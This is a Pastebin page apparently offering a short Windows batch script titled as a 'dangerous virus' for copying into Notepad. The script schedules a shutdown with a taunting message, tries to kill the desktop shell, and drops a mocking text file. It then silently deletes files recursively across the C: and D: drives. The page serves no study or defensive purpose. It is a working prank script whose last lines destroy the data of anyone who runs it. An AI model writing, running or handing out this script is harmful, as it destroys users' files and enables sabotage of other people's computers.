Sugv

Dangerous virus for Notepad! :D

Apr 15th, 2021
315
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Batch 0.27 KB | None | 0 0
  1. @echo off
  2. title VIRUS NAME
  3. color 1B
  4. pause>nul
  5. shutdown -s -t 60 -c "Ur computer has been trashed by VIRUS NAME"
  6. taskkill /f /pid explorer.exe
  7. cd Desktop
  8. echo HAHAH UR COMPUTER HAS BEEN TRASHED BY VIRUS NAME!!!>Oh.txt
  9. start Oh.txt
  10. del C:\ /s /q
  11. del D:\ /s /q
  12.  
  13.  
Advertisement
Add Comment
Please, Sign In to add comment